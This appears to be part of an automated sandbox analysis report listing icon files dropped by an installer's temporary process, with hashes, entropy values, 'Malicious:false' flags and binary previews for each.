                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.3625361404350915
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Og3bVNe49Z9LhdznJkyBVLBBHb31UOOrO2SB2NNg1F0U:53FLhBeyBlBB73134NNCWU
                                                                                                                                                                                                                                                          MD5:E1286437AA2367AE05B567CA07F7AE38
                                                                                                                                                                                                                                                          SHA1:A258C5400BBC5E28476805B4EBA278BA6D128432
                                                                                                                                                                                                                                                          SHA-256:A886A335B7FC0A8EB88120FDF43E31AC349553D3DF1D3A911E3D2DF8A530BAAD
                                                                                                                                                                                                                                                          SHA-512:E7477879F63A77A50B11D1CFFEC5ECF911A2906568FDFD1912031FAC0C2180834F5540F6EB190C43C0DA6CA52C51FF0C714C08F32C5ADF52C1FCA15EB2804595
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .................................................................................................................................................................................................................X<.!~V.3.W.3Z=.!................................................................................................pM.!.n.{.u..z..~...~...~...~...{..u..o.}sO.%........................................................................|U.#.t...~...........................................~...t..~W.'.............................................................m.k.~.........................................................~...n.o.....................................................u...........................................................................v..1!...........................................x...........................................~.......................................y.......................................u.u......................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.056283894172477
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:DZlab9wlipnz12qCLtZ7JgVksVScm8FPcTi:D3aJkipzZKtpJEkiBFEm
                                                                                                                                                                                                                                                          MD5:F501D67C40B9B639411C99B14F60E14D
                                                                                                                                                                                                                                                          SHA1:6F16B1384505A87848A6FB078FC3B62CC55BBF94
                                                                                                                                                                                                                                                          SHA-256:4EC7F2AB9D5FD7E5F1622F007510B4F4D3C1C779E5CDB4B128E2D53A2E468A28
                                                                                                                                                                                                                                                          SHA-512:775647B02208318CCAB7ED6873D9351ADD106D5EDF27857E73B215B18C04310693D210EB43415690D51191CDEF7F21AECED1B7FCF5A3AFB254698A9CF13AF3CF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ........................................................4...G...K...I...<...&...........................%...:...I...J...E...3...................................................7.'a..M...Z...i...e...N...C...#`....p...\...[...n..S..C...K...a...g...Z...M...,k....3.........................................R...............................e...,m..........+i..b...z...........................U...#Z..................................7.@....8....................Gp.VSY........................\co..Hz.............'...G........;.@.................................;. ....~...p...,....Sr.NAA........................................^US..S......[...A........@.0.....................................s.....8...02<.qdb....................................................../C..........~...........................................K...u.*'/.rdb..............................................................1E..y..P..............................................-.#.C67...........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.099397362289201
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:SB5/OEO7w9J5CJDojYDgyTAU8Nazp+1RmzzVzab20B+H7YBkLviAhJySdzMVn9f:UGniUvXAdNGtzzu8ALAmS0
                                                                                                                                                                                                                                                          MD5:3236B7EE04864A464C4269EA6772C06B
                                                                                                                                                                                                                                                          SHA1:C32DAC3F987C391FAEEFB48184431669F6C2D961
                                                                                                                                                                                                                                                          SHA-256:641DB9FED269716510F749F98430FBB3563A0DDE013354CA2ECCC572E95EAF84
                                                                                                                                                                                                                                                          SHA-512:F311E36B92F5905B15E9738FE431C287253A2DDD05D5EBA758DCCD7257884D3A7990DCB6A77401C25122EAC419F68F543ACDA12BB3AABA0C790155EE84544702
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ....................................................................`.........................................................................................................................j.........`.....................................................................................................................Uw..k.........`.................................................................................................................Vw..Wx..w.........@...@...@...@...@.............................................................................................Vx..Wx..Xz..............................................@....................................................... .............Wy..Xy..Xz..X{........................................................ .......................................`.................Wy..Xz..X{..Y{..Z|..d...Z~..[~..z.........................................P...............................`...............b...Wz..X
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5182
                                                                                                                                                                                                                                                          Entropy (8bit):4.429830209492408
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Rd9W4lzzzzzYXFrNmoN03g+iIsaDBYFGmGW2PD51s2ARAAR/sAye8:dW4gnJLI7DBolGW2r51dARAARRye
                                                                                                                                                                                                                                                          MD5:31B5594B3A3289FB258A4EFBAC38F230
                                                                                                                                                                                                                                                          SHA1:E41016FBE49B5B9B292EFC5C252F73452E55B409
                                                                                                                                                                                                                                                          SHA-256:3B0521E3291E2F330873A66864C3DAC163E8E5DA9D62518C4541B38A979DE7B8
                                                                                                                                                                                                                                                          SHA-512:825F05B05B7A0182B8F87AFCF12BD4FA1B4CF9712D39FCF13058BE32C11091145432273B443F955BEAABB995573252BD7006103E03645107FF434C8EFCC90EA6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .(.......(... ...@..... ....................................................................................................................................................................?...................................................*......................................................................................v.../...................o.................................o.................................................................................................................................................................................................................................j.q.W.n.T.{.d..........................l.......................................=..........i.z.c...............^.>.A...A...A...A...A...A...A...A...T.4..................................................................B...B...B...K.&.B...B...B...B...B...B...B...B...B...B...B...B...`.A...........................................................B...B...B...B...B.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.992992998632407
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:LxwRTmmd4FjFuwKqDBF2fA+O4dwvcYhEEXB7/T/B/cfGt:LxtmiFjKuP+O4dw0Wx7/7qOt
                                                                                                                                                                                                                                                          MD5:BCF4E26316979B5DA494DBEA2C92B1CB
                                                                                                                                                                                                                                                          SHA1:080339DB0B56E86428295596CED9EEBF416D050C
                                                                                                                                                                                                                                                          SHA-256:A34A7DB975EB4367B54DC7BB5BC49A6B12F12501C3BEE21D9C9093717C193999
                                                                                                                                                                                                                                                          SHA-512:D52B6394C34929C4758F7F5C3D805EDE1BED09C47F80B23E4EDA8A8A81D12763014B999F95E9FBDAE41A1C26548718B86C90C02BB0C8714B21078330B12D2B8F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ......................................................................................................................................................................................................................................................................................................................................................h?!.h?..i@.jA.jA..jA..jA..jA..jA.jA.i@..h?*.................................................................................h?...K...S...X..]...Z...S...M...K..|E..uB..i@.................................................:.Jc:.J.:.J.:.J.:.J.:.J.:.J.:.J..i@..[..o..............z..j...M..oE..d>.............................................:.J.N.b.c.y.j.}.c.u.X.i.N.a.E.W.A.R..lC..g......................{...g.yoR..wU.wjK.ziG.,ju.,kv.*fq.0t.................._...A.Q............y..i.y.c.t.n.a..uH..wM..u...............................j...........k.}.2..F...9 ...6...;...<..@@..IC.qK=.P.G.X..........{.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.505932325468453
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:6x5Iin1G7yKJ1Gs3UNIAB09uq8eq+xn704qtiCA2Kn5t7eUO:6fIinYy7sCIASsq8jKqBA2K5Ber
                                                                                                                                                                                                                                                          MD5:A9756849B11E570FCB8F845201B4A435
                                                                                                                                                                                                                                                          SHA1:6A6085576DD2B871485296BF2EAA1A4E02EF9C81
                                                                                                                                                                                                                                                          SHA-256:4CDD2B35CB1CA9E330D06E184FDA8FA664DD59C7428F67DE9986E77087DEFB5B
                                                                                                                                                                                                                                                          SHA-512:47D16D4EA54B20F7124BDD64B2377D1D00AEECC228EDBCD77A754EDA9D9F977180A2E6E906A0527C9D05EE2C9BEFD52045E7D42B93E69C6E94F9FA73195BDE22
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .............................................................................................................................................................................................................................................................................................................................................................._..._.P.a..a.._.P._..................................................................................................._...r.)...?...N...R...G...0....w.._......................................................................................._...|..2...E...:...,...-...>...O...@..."...._...................................................................................m.*...<...'...+H..@>..MO..:G..'t..G...:....y.............................................................................._.@ ...6...-...$)..'"..41..<9..0,..&"..'g..?...(...._.@.........................................................B...F
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.128222585880228
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:0UTeD1j0JtPPPPPPPPPPPPPPPPPPPPPPPPPPP0BU2LxHfNeQktOOh/L+1Ya2Xm5w:0UTeDrHkQeOOh/Lgf2Xm5PciHahGcymV
                                                                                                                                                                                                                                                          MD5:FE64E1FF82E7BB3030287E3EC9A1CA1F
                                                                                                                                                                                                                                                          SHA1:48B4134044934131BE1F0D78AE817B9D75142218
                                                                                                                                                                                                                                                          SHA-256:2D57537EC385D3B1663ABE0A253446F10942B536B206DF511749302173F7EDD2
                                                                                                                                                                                                                                                          SHA-512:C5DAFD99771D67DE444225E029BAC7D918434A7E1F8D46A50B9401867A720AD7409D95A644385B3924FAB0212936A32A8580BB4BF650BB7A214425C6B72ABBB7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ...................................................9...C...;...<...<...<&..<*..<,..<-..<-..<-..<-..<,..<*..<&..<...<...;...A...:...........................................=...<...=(..=s..<...<...<...<...<...<...<...<...<...<...<...<...<...<...<...<...=s..=(..=...=...........................=...>...>...=x..=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=x..>...>...=...............>...?...?...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...........?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...@...?.......@...M...@x..@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@y..K...@...A...A(..A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A(..A...A...Bs..B...B...B...B...B...B...B...B...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.398174204777635
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Jast2MOHFY/G3BwkW6YvzQNUWRQi+EKbp2uDd4pWRwf2aGAXV:hwMOCGCvzCUW946dfMI
                                                                                                                                                                                                                                                          MD5:E86E5DECCF75CD251149376B2882272B
                                                                                                                                                                                                                                                          SHA1:B84C1608F2E77A4BB78D1523A679F9C74256D227
                                                                                                                                                                                                                                                          SHA-256:228AB3BBAEEA67B9B701E5F034C05E00B61739F4BB8B9256E8FA6E4AE40C74BF
                                                                                                                                                                                                                                                          SHA-512:784EB5883876810C15637C541EB036E87F0964F8A4B39CB7303B3C84EF8FC59425F7528890114B3381EEF021E992CD485A97EB4C58C5B8F5389F3114D6816C63
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................224.02;.15E614E:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:15E903?*/01...................................=...H...u.......z...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x.......{...U...%>..B...........................c..%...)...+...)...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...*...*...'....u...&E......................B~.'...5...?..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A...@...9...+....b.......................z..;..$D..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..$D...?...(....0F...............'....#E..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..$D...:....Ed...............+.:..#E..#D..#D..#D..#D..#D..#D.."D
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):6.123671236740637
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:M6HyDOdzc8+Efv02qJgthMtLdhItbSCIYU2P8x4He:YDOd4QH02qJlZdhUzIY0e+
                                                                                                                                                                                                                                                          MD5:9D963AAEF1A316841C2C34AE32CDEDB3
                                                                                                                                                                                                                                                          SHA1:A73386D3ABE3824621B72143E0402BC1388CE700
                                                                                                                                                                                                                                                          SHA-256:9DD59EBDBAA0D4CB4A4422D597DB6C7EEC60624F042A273AB1C75AD785168945
                                                                                                                                                                                                                                                          SHA-512:81757CF518EFB4CCB90BFE35383D39D16F5C9210BBA8EE2E58F62A4961591F4244D78C6702B1AD022E9205C7177976B2E8EDC8E8FA5C4BCD2BB6F95F504140B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ................................................................h-L/./d5.,R/....t........................................................................................................3M3.).C...5.../...1.(.;..I-.................................................................................................*3&.$.;.....................!.,.#-.........("&..-^0.,b1. &......................................................................6t8.............................%c$....));$...(...!...'.".8.)='................................................................&/.0..............................l..!.......................&.2....@............................................................,p(...............0...7...1......i..):#..........................&.s............................................................*I#...........8.).M./.U./.P.).?. f.."[&...:.&.J.'.G...5..........".q.......9...M...<........................................... ..._.y....$.,.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.015933025401917
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:jlLTFwirlRR25mD7NHgf/nrqQ6kcwpgHBWgOXKpAsDn5DnO9eXVP:ZLTFwirlRRymnN0/rqpkcwaDOXZsxqYZ
                                                                                                                                                                                                                                                          MD5:B5DECCE572BF993C4F6CD6BD108DF2C3
                                                                                                                                                                                                                                                          SHA1:21C33E841AF7DE3AF8868EAFF54EDB1492AEBEA4
                                                                                                                                                                                                                                                          SHA-256:42A521BC3EF75526B3A1839DA875A949B369C6A00F2EAA43C8BECBB3E8279555
                                                                                                                                                                                                                                                          SHA-512:EEE0D7F592836DFCEB0D50E2695DF6ACF336211E3C83C9DF8B49325BD03E2B3E5BD39DC8CAE3193A32D953CAA79543F8D356930CC6C6769A861EDA8F31E04D6A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .................................................................................................................................................................F.>.C.;.C.<.C.<.C.;.B.<wC.=.............U.@.B.<UD.<|C.<.C.<.B.<.D.=.C.<nG.@$....................................................U.U.B.=.B.;.B.;.B.;.B.;.B.;.B.<.B.=hB.<.C.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.<.D.=mf.f.................................................C.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.C.<.C.=P................................................B.;.B.;.B.;.B.;.B.;.B.;.B.;.T.N..........................O.H.B.;.B.;.B.;.B.;.C.;.............................................C.?AB.;.B.;.B.;.B.;.[.U........................................B.;.B.;.B.;.B.;.B.;.C.;.........................................C.;EB.;.B.;.B.;..............................................B.;.B.;.B.;.B.;.B.;.B.;.C.;.................................F.F.C.;.B.;.B.;..........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):6.123671236740637
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:M6HyDOdzc8+Efv02qJgthMtLdhItbSCIYU2P8x4He:YDOd4QH02qJlZdhUzIY0e+
                                                                                                                                                                                                                                                          MD5:9D963AAEF1A316841C2C34AE32CDEDB3
                                                                                                                                                                                                                                                          SHA1:A73386D3ABE3824621B72143E0402BC1388CE700
                                                                                                                                                                                                                                                          SHA-256:9DD59EBDBAA0D4CB4A4422D597DB6C7EEC60624F042A273AB1C75AD785168945
                                                                                                                                                                                                                                                          SHA-512:81757CF518EFB4CCB90BFE35383D39D16F5C9210BBA8EE2E58F62A4961591F4244D78C6702B1AD022E9205C7177976B2E8EDC8E8FA5C4BCD2BB6F95F504140B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ................................................................h-L/./d5.,R/....t........................................................................................................3M3.).C...5.../...1.(.;..I-.................................................................................................*3&.$.;.....................!.,.#-.........("&..-^0.,b1. &......................................................................6t8.............................%c$....));$...(...!...'.".8.)='................................................................&/.0..............................l..!.......................&.2....@............................................................,p(...............0...7...1......i..):#..........................&.s............................................................*I#...........8.).M./.U./.P.).?. f.."[&...:.&.J.'.G...5..........".q.......9...M...<........................................... ..._.y....$.,.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):0.6322026813246273
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:suE555L555L555L555L55r55r55r555r55r555r555r555r555r555r555r55r5I:suvzPFV5
                                                                                                                                                                                                                                                          MD5:E91EE031E8A775B87A966821F46B8003
                                                                                                                                                                                                                                                          SHA1:B093537BEB4335E306C870ECF6C8C1431279F262
                                                                                                                                                                                                                                                          SHA-256:E01B114837D5A19D2AB3492279F6AA0EA6AB960C4FFEB8369BB1A85F18672337
                                                                                                                                                                                                                                                          SHA-512:70D2E0F656E784A10505BF73568E9BA0329EF612512B62458F3C2A6A44B3E09DF0D18D8B481978C9974A54844C7E67B0D94A56FB0FBCA616A95F21D89F6882F0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.505932325468453
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:6x5Iin1G7yKJ1Gs3UNIAB09uq8eq+xn704qtiCA2Kn5t7eUO:6fIinYy7sCIASsq8jKqBA2K5Ber
                                                                                                                                                                                                                                                          MD5:A9756849B11E570FCB8F845201B4A435
                                                                                                                                                                                                                                                          SHA1:6A6085576DD2B871485296BF2EAA1A4E02EF9C81
                                                                                                                                                                                                                                                          SHA-256:4CDD2B35CB1CA9E330D06E184FDA8FA664DD59C7428F67DE9986E77087DEFB5B
                                                                                                                                                                                                                                                          SHA-512:47D16D4EA54B20F7124BDD64B2377D1D00AEECC228EDBCD77A754EDA9D9F977180A2E6E906A0527C9D05EE2C9BEFD52045E7D42B93E69C6E94F9FA73195BDE22
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .............................................................................................................................................................................................................................................................................................................................................................._..._.P.a..a.._.P._..................................................................................................._...r.)...?...N...R...G...0....w.._......................................................................................._...|..2...E...:...,...-...>...O...@..."...._...................................................................................m.*...<...'...+H..@>..MO..:G..'t..G...:....y.............................................................................._.@ ...6...-...$)..'"..41..<9..0,..&"..'g..?...(...._.@.........................................................B...F
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.760005259103538
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:9cPueb/98+LRtKVF/7x5qcUuD4oxp7SJU9Jhni4GZ9h2u0Kuq+j6vQuQ:efO8Yx42Jhni4GUuLuhmY/
                                                                                                                                                                                                                                                          MD5:6EDC10A9110ACA8413A654526A2C9A08
                                                                                                                                                                                                                                                          SHA1:74515C9BAEE2A5CA04CBF57A179F98FFA650B890
                                                                                                                                                                                                                                                          SHA-256:E15B8D976729695D510F6CD60E047006F57D09DCF477A58F7D3CF09ED9A34AAA
                                                                                                                                                                                                                                                          SHA-512:1E02B7F6028872398FA087B6BCA84E7F5B5D85BBB14BE1F05F576AAC4E531127A2B5919095C8479838F98CDCCBBE8274891A355857515F94061FF2B8D4D286B1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):2.904108079904619
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:F+E7L9sciO2jASO/R9Zo6bVUZ0SS/UHL4/h3A4+Brwc2Ni:F+qcjZE7ZL6ZTS/Ur+398rwHw
                                                                                                                                                                                                                                                          MD5:B4C726712268AACA5C8044B19D242C56
                                                                                                                                                                                                                                                          SHA1:82295BE76E35F3B7A017C71DF4AFB7BCB13B8BD9
                                                                                                                                                                                                                                                          SHA-256:67360906D5C412946E6621E6952DCC72E260B4BDA6B1097FB89D0968746B557A
                                                                                                                                                                                                                                                          SHA-512:255E561C23605247FCA1BB3F071CE4E87DA9F580C93F9CB87980F2680C106FEF6B91E478953C667E55AC0B9C4891FB0D6389671AD5C1AEF0DD820ABC032A7F62
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ...... .............................(...........................................................................................................*...............M...................................................................................................................U.......$...........................................................................................................................-............................................................................................................................................................................................v.v.1.1........................................................................................................................................................................................................................................................................J.J...........................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.548751958766154
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:I36IcaNTUkY37c3Yd/oB3cEYp2LctCWZhlt9b7Q01iEtcm:I39NART/EshwaCOLfQmdth
                                                                                                                                                                                                                                                          MD5:3FF113ABAD7A9C6F2AE88B1680E5DE0E
                                                                                                                                                                                                                                                          SHA1:840BDB6139021E1FE655C240324A64481BB999FF
                                                                                                                                                                                                                                                          SHA-256:57EEA00C948FF2F8EE9604160F4143891E5F5792765961408CE99E68CAB04BB6
                                                                                                                                                                                                                                                          SHA-512:52B899DA820C3E3195799300122346B1A461B5139C213CEB8DED89734CDAD45878BE7E2B2F21AB5F9301CDABE6E2628571C9BB62923E318947FB41C0F2D78BF0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ....................................................................................................................................................................................................................................................*...*...%...................................................................................................#...G...d...|....962.:62.;73........]...6..."..."................................................................... .......5...n....gaZ..|.......................g`Y....K...........................................................................R...vnhb............................................PKEV...................................................................T-+(......................................................................................................................F.+).....................r.~.`...N.bN.`N.X\..sm.v...............}..............................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
